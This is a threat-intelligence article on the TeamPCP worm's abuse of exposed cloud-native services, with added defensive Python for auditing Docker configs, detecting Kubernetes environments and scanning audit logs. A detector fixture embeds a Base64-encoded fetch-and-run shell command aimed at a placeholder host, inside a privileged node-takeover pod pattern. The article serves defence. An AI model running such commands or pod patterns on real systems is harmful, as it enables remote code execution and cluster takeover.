TeamPCP Worm
Cybersecurity researchers have uncovered a sweeping, worm-driven campaign that systematically targets cloud-native environments to construct malicious infrastructure for subsequent exploitation. Activity tied to this operation was observed around December 25, 2025, revealing a coordinated effort to abuse exposed services and vulnerabilities across modern cloud stacks.
TeamPCP: A Rapidly Emerging Threat Cluster
The campaign has been attributed to a threat cluster tracked as TeamPCP, also known by aliases including DeadCatx3, PCPcat, PersyPCP, and ShellForce. Evidence suggests the group has been operational since at least November 2025, with related Telegram activity dating back to July 30, 2025. The TeamPCP Telegram channel, which has grown to more than 700 members, is used to publish stolen data linked to victims in Canada, Serbia, South Korea, the United Arab Emirates, and the United States.
Researchers first documented the actor’s operations in December 2025 under the designation Operation PCPcat.
Opportunistic Abuse of Cloud-Native Weaknesses
TeamPCP operates as a cloud-native cybercrime platform, capitalizing on exposed management interfaces, common misconfigurations, and critical vulnerabilities, including the recently disclosed React2Shell flaw (CVE-2025-55182, CVSS 10.0). The primary infection pathways observed in the campaign include:
- Exposed Docker APIs
- Exposed Kubernetes APIs
- Ray dashboards
- Redis servers
- Vulnerable React/Next.js applications
These weaknesses are exploited not to target specific industries, but to opportunistically seize infrastructure, most frequently within Amazon Web Services and Microsoft Azure environments, turning affected organizations into collateral victims.
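The first pathway on that list, an unauthenticated Docker API, is usually a one-line misconfiguration in daemon.json. The following checker is an added example (not code from the researchers or from TeamPCP's tooling); the two daemon.json fragments are constructed, with hypothetical addresses and certificate paths, and it flags the three properties a mass scanner is looking for: a tcp:// listener with no tlsverify, a bind to every interface, and the conventional plaintext port 2375.

```python
import json
from urllib.parse import urlsplit

# Constructed daemon.json fragments (hypothetical hosts and paths).
WEAK_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
})
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})


def audit_docker_hosts(daemon_json: str) -> list:
    """Return findings for every tcp:// listener in a daemon.json document.

    A TCP listener without tlsverify hands root-equivalent control of the host
    to anyone who can reach the port (POST /containers/create with a bind
    mount of / is enough), which is exactly what the scanners described here
    look for.
    """
    cfg = json.loads(daemon_json)
    tls_verify = bool(cfg.get("tlsverify", False))
    findings = []
    for host in cfg.get("hosts", []):
        if not host.startswith("tcp://"):
            continue
        url = urlsplit(host)
        if not tls_verify:
            findings.append(f"{host}: TCP listener without tlsverify")
        if url.hostname in (None, "0.0.0.0", "::"):
            findings.append(f"{host}: bound to all interfaces")
        if url.port == 2375:
            findings.append(f"{host}: conventional plaintext port 2375")
    return findings


if __name__ == "__main__":
    for label, doc in (("weak", WEAK_DAEMON_JSON), ("hardened", HARDENED_DAEMON_JSON)):
        print(label, audit_docker_hosts(doc) or "no findings")
```

One caveat when running this on real hosts: on distributions whose systemd unit starts dockerd with an explicit -H flag, a hosts key in daemon.json conflicts with the flag and the daemon refuses to start, so the unit's ExecStart line is the other place a TCP listener can be added and must be audited as well.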
Industrialized Exploitation at Scale
Rather than relying on novel techniques, TeamPCP emphasizes scale and automation. The operation combines established tools, known vulnerabilities, and widely documented misconfigurations to industrialize exploitation. Compromised environments are transformed into a self-propagating criminal ecosystem that supports scanning, lateral movement, persistence, and monetization.
The overarching objectives include building distributed proxy and scanning infrastructure, exfiltrating data, deploying ransomware, conducting extortion campaigns, and mining cryptocurrency. Compromised assets are also repurposed for data hosting, proxy services, and command-and-control relays.
Modular Payloads and Cloud-Aware Tooling
Successful initial access enables the delivery of secondary payloads from external servers, typically in shell or Python form, designed to expand the campaign’s reach. A central component, proxy.sh, installs proxy, peer-to-peer, and tunneling utilities while deploying scanners that continuously probe the internet for new vulnerable targets.
Notably, proxy.sh performs runtime environment fingerprinting to determine whether it is executing inside a Kubernetes cluster. When such an environment is detected, the script follows a separate execution path and deploys cluster-specific payloads, underscoring the group’s tailored approach to cloud-native targets.
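The page does not show how proxy.sh makes that decision, so the following is an added example of the conventional in-cluster fingerprint rather than the script's own logic: the KUBERNETES_SERVICE_HOST/PORT variables the kubelet injects into every pod, the mounted service account token, and the "kubepods" component in the container's cgroup path. It takes the environment and a file reader as parameters so it can be exercised offline; the two host views at the bottom are constructed, not real data.

```python
import os
from typing import Callable, Dict, Mapping, Optional

SA_DIR = "/var/run/secrets/kubernetes.io/serviceaccount"


def kubernetes_signals(env: Mapping[str, str],
                       read_file: Callable[[str], Optional[str]]) -> Dict[str, bool]:
    """Report the conventional in-cluster indicators.

    - the kubelet injects KUBERNETES_SERVICE_HOST/PORT into every pod's env
    - a pod with a mounted service account has token, ca.crt and namespace
      under SA_DIR (the token is also the first credential a harvester reads)
    - the cgroup path of a container's init process usually contains "kubepods"
    """
    token = read_file(f"{SA_DIR}/token")
    cgroup = read_file("/proc/1/cgroup") or ""
    return {
        "env": "KUBERNETES_SERVICE_HOST" in env and "KUBERNETES_SERVICE_PORT" in env,
        "serviceaccount_token": bool(token and token.strip()),
        "cgroup_kubepods": "kubepods" in cgroup,
    }


def in_kubernetes(env, read_file) -> bool:
    """The branch decision: any single indicator selects the cluster path."""
    return any(kubernetes_signals(env, read_file).values())


def read_real_file(path: str) -> Optional[str]:
    try:
        with open(path, encoding="utf-8", errors="replace") as f:
            return f.read()
    except OSError:
        return None


# Constructed views of two hosts so the check runs offline (not real data).
POD_ENV = {"KUBERNETES_SERVICE_HOST": "10.96.0.1", "KUBERNETES_SERVICE_PORT": "443"}
POD_FILES = {f"{SA_DIR}/token": "eyJhbGciOiJSUzI1NiJ9.constructed.token",
             "/proc/1/cgroup": "0::/kubepods/burstable/pod1234/abcdef"}
PLAIN_ENV = {"PATH": "/usr/bin"}
PLAIN_FILES = {"/proc/1/cgroup": "0::/init.scope"}

if __name__ == "__main__":
    print("this process:", in_kubernetes(os.environ, read_real_file))
    print("constructed pod:", kubernetes_signals(POD_ENV, POD_FILES.get))
```

The same three signals are cheap to monitor or remove from the defender's side: setting automountServiceAccountToken: false on pods that never talk to the API server takes away both the token file and the credential a harvester would read next, and a file-access rule on SA_DIR/token fired from a shell interpreter catches the read itself.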
A subset of the supporting payloads includes:
- scanner.py, which downloads CIDR ranges from a GitHub account associated with DeadCatx3 to locate misconfigured Docker APIs and Ray dashboards, with optional cryptocurrency mining via mine.sh
- kube.py, which focuses on Kubernetes credential harvesting, API-based discovery of pods and namespaces, propagation through accessible pods, and persistence via privileged pods mounted on each node
- react.py, which targets React/Next.js applications to achieve remote command execution at scale; the identifier cited for it, CVE-2025-29927, is the Next.js middleware authorization bypass rather than the React2Shell flaw named above
- pcpcat.py, which scans large IP ranges for exposed Docker APIs and Ray dashboards and deploys malicious containers or jobs running Base64-encoded payloads
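Two of the behaviours above leave a recognisable shape in Kubernetes audit logs: kube.py's persistence via privileged pods on every node, and the pcpcat.py habit of running a Base64-encoded payload in whatever it deploys. The detector below is an added example (not the researchers' or the actor's code) that scans audit events for pod or DaemonSet creates with host namespaces, a hostPath mount of /, privileged containers, or a command that pipes a decoded blob into a shell, and recovers the plaintext of that blob for the analyst. It assumes the API server's audit policy records requestObject (level RequestResponse) for those resources; the two audit records are constructed, and the decoded URL uses the reserved example.invalid name.

```python
import base64
import json
import re
from typing import Iterable, Optional

B64_PIPE_SH = re.compile(r"base64\s+(?:-d|--decode)\b[^|]*\|\s*(?:sh|bash)\b")
B64_BLOB = re.compile(r"echo\s+['\"]?([A-Za-z0-9+/=]{16,})['\"]?\s*\|")


def container_cmd(c: dict) -> str:
    return " ".join((c.get("command") or []) + (c.get("args") or []))


def decode_payload(cmd: str) -> Optional[str]:
    """Recover the plaintext behind an `echo <b64> | base64 -d | sh` command."""
    m = B64_BLOB.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:
        return None


def pod_spec_findings(spec: dict) -> list:
    """Flag the node-takeover shape: host namespaces, hostPath of /, privileged
    containers, and commands that pipe a decoded blob into a shell."""
    findings = [k for k in ("hostPID", "hostNetwork") if spec.get(k)]
    for vol in spec.get("volumes") or []:
        if (vol.get("hostPath") or {}).get("path") == "/":
            findings.append("hostPath:/")
    for c in spec.get("containers") or []:
        name = c.get("name", "?")
        if (c.get("securityContext") or {}).get("privileged"):
            findings.append(f"privileged:{name}")
        if B64_PIPE_SH.search(container_cmd(c)):
            findings.append(f"b64-shell:{name}")
    return findings


def extract_pod_spec(event: dict) -> Optional[dict]:
    """Pod spec from a pod create, or from the template of a workload that
    schedules pods onto every node (DaemonSet) or many nodes."""
    if event.get("verb") != "create":
        return None
    resource = (event.get("objectRef") or {}).get("resource")
    obj = event.get("requestObject") or {}
    if resource == "pods":
        return obj.get("spec")
    if resource in ("daemonsets", "deployments", "jobs"):
        return ((obj.get("spec") or {}).get("template") or {}).get("spec")
    return None


def scan_audit_log(lines: Iterable[str]) -> list:
    """One hit per suspicious create: who did it, where, what was found, and
    the decoded payload if a container command carried one."""
    hits = []
    for line in lines:
        if not line.strip():
            continue
        ev = json.loads(line)
        spec = extract_pod_spec(ev)
        findings = pod_spec_findings(spec) if spec else []
        if not findings:
            continue
        payloads = [p for p in (decode_payload(container_cmd(c))
                                for c in spec.get("containers") or []) if p]
        ref = ev.get("objectRef") or {}
        hits.append({"user": (ev.get("user") or {}).get("username"),
                     "namespace": ref.get("namespace"), "resource": ref.get("resource"),
                     "findings": findings, "payload": payloads[0] if payloads else None})
    return hits


# Constructed audit records (RequestResponse level), not real telemetry.
_B64 = base64.b64encode(b"curl -s http://example.invalid/proxy.sh | sh").decode()
SAMPLE_AUDIT_LOG = "\n".join(json.dumps(e) for e in [
    {"kind": "Event", "verb": "create",
     "user": {"username": "system:serviceaccount:web:deployer"},
     "objectRef": {"resource": "pods", "namespace": "web", "name": "nginx"},
     "requestObject": {"spec": {"containers": [{"name": "nginx", "image": "nginx:1.27"}]}}},
    {"kind": "Event", "verb": "create",
     "user": {"username": "system:serviceaccount:default:default"},
     "objectRef": {"resource": "daemonsets", "namespace": "kube-system", "name": "node-agent"},
     "requestObject": {"spec": {"template": {"spec": {
         "hostPID": True,
         "volumes": [{"name": "host", "hostPath": {"path": "/"}}],
         "containers": [{"name": "agent", "image": "alpine",
                         "securityContext": {"privileged": True},
                         "command": ["sh", "-c", f"echo {_B64} | base64 -d | sh"]}]}}}}},
])

if __name__ == "__main__":
    for hit in scan_audit_log(SAMPLE_AUDIT_LOG.splitlines()):
        print(json.dumps(hit, indent=2))
```

The user field is worth keeping in the hit: a create issued by a namespace's default service account is the signature of a harvested token being replayed from inside a pod. The same spec properties the detector flags are the ones a Pod Security Admission baseline or restricted policy rejects outright, which turns this detection into prevention in namespaces where the policy can be enforced.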
Command-and-Control and Post-Exploitation Capabilities
Researchers have linked a command-and-control node at 67.217.57[.]240 to the operation, noting overlaps with the use of Sliver, a legitimate open-source C2 framework frequently abused by threat actors during post-exploitation phases.
A Hybrid Monetization Model Built for Resilience
The PCPcat campaign demonstrates a complete attack lifecycle (scanning, exploitation, persistence, tunneling, data theft, and monetization) engineered specifically for cloud infrastructure. The primary danger posed by TeamPCP lies not in technical innovation but in operational integration and scale: most of its exploits and malware leverage well-known vulnerabilities and lightly modified open-source tooling.
At the same time, the group blends infrastructure abuse with data theft and extortion. Leaked CV databases, identity records, and corporate data are published through ShellForce to fuel ransomware operations, fraud, and reputation-building within the cybercrime ecosystem. This dual monetization strategy, profiting from both compute resources and stolen information, provides multiple revenue streams and increases resilience against disruption and takedowns.